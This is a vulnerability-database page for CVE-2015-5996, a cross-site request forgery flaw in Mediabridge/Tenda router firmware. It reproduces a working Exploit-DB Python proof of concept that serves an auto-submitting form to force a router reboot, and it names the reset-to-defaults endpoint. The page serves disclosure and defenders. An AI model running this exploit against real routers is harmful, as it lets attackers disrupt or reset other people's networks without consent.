VIR Vulnerability Intelligence Relay

CVE-2015-5996

high
Published 2015-12-31 ยท Modified 2026-05-06
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
8.8
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
9.8

Description

Cross-site request forgery (CSRF) vulnerability on Mediabridge Medialink MWN-WAPR300N devices with firmware 5.07.50 allows remote attackers to hijack the authentication of arbitrary users.

Predictions

Exploit likelihood
92%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-45078 webapps hardware python ยท 2 KB
Nathu Nandwani ยท 2018-07-23

Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)

python exploit Source: Exploit-DB 
# Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)
# Date: 2018-07-21
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co
# CVE: CVE-2015-5996
#
# Description:
#
# The router is vulnerable to a cross-site request forgery attacker. 
# If an administrator is currently logged in and visits a 
# remote webpage containing forms existing in the router's firmware, 
# a request can be forged to modify existing settings or even 
# set the router to its default state.
#
# These are two examples that can work in the proof of concept: 
# /goform/SysToolReboot - Reboot the router
# /goform/SysToolRestoreSet - Set the router to default settings
#
# Reference: https://www.kb.cert.org/vuls/id/630872

import socket

server_ip = "0.0.0.0"
server_port = 80

router_ip = "192.168.0.1"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)

print "Currently listening at " + server_ip + ":" + str(server_port)        

client, (client_host, client_port) = sock.accept()

print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)

client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
    <body>
        <form method="post" id="frmSetup" name="frmSetup" action="http://""" + router_ip + """/goform/SysToolReboot">
            <input name="CMD" value="SYS_CONF" type="hidden">
            <input name="GO" value="system_reboot.asp" type="hidden">
            <input name="CCMD" value="0" type="hidden">
        </form>
        <script>
            document.getElementById("frmSetup").submit();
        </script>
    </body>
</html>
""")

client.close()
sock.close()

References

CWEs

CWE-352

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.